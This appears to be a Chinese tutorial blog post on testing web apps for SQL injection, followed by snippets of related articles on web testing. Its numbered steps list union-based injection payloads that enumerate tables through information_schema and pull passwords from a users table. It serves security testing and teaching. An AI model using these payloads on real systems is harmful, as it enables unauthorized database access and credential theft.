測試web應用程式搜尋SQL注入漏洞

2021-07-12 02:46:58 字數 725 閱讀 5789

1.簡單的sql注入(select colunmns from table where criteria='')

在搜尋框中輸入 ' 然後單擊,檢視sql錯誤資訊,如果返回錯誤資訊說明出現未匹配的單引號,結構破壞

輸入:' or 1=1#'(資料庫的注釋方式很多包括--。#。//)

2.查詢列表中有多少列

' union select null #'  合併一列

'union select null,null #'  合併兩列     直到合併查詢出列數

3.查詢表明(資料庫有乙個特殊物件information_schema,這個物件包含了每張表的名稱,字段,元素)

'union select null,table_name from information_schema.tables#'

4,查詢表字段名稱

'union select null,colunmn_name from information_schema.colunmns  where table_name='users '#'

5,查詢重要欄位名稱資料

'union select null,password  from users#'  根據得到的欄位名稱和表名稱,可以查詢出資料

6,把查詢出的資料和使用者列表進行交叉使用

'union select password,concat(first_name,'',last_name,'',user)  from users

Web應用程式完全測試指南

摘要 大量的優質應用逐漸提公升了使用者的品味,也降低了使用者的容忍度,如果你的web應用無法使使用者滿意,那麼很快會有其他應用來代替。這要求開發者從各方面對其進行測試,以便讓使用者在使用過程中不會出現各種各樣的問題。隨著web技術和移動網際網路的發展,越來越多的應用被遷移到了雲端,這也使得使用者可以...

Web應用程式完全測試指南

隨著web技術和移動網際網路的發展,越來越多的應用被遷移到了雲端,這也使得使用者可以隨時隨地使用它們。目前大量的優質應用,逐漸提公升了使用者的品味,也降低了使用者的容忍度,如果你的web應用無法使使用者滿意,那麼很快就會有其他的應用來代替。對於開發者來說,建立良好的客戶口碑才是最有意義的事情。在完成...

Web應用程式壓力測試步驟

對不同的系統其壓力測試的強度和側重點也不同。乙個用於中小企業內部網和乙個要處理大量使用者的電子商務站點的負荷量和負荷分布是明顯不同的。前者的最大負荷量和負荷分布是可預期的,而且對企事業單位內部網來說,暫時關閉系統後重新起動也是可以接受的。例如乙個高校的選課系統只在進行選課的幾天內要求系統能承受大負荷...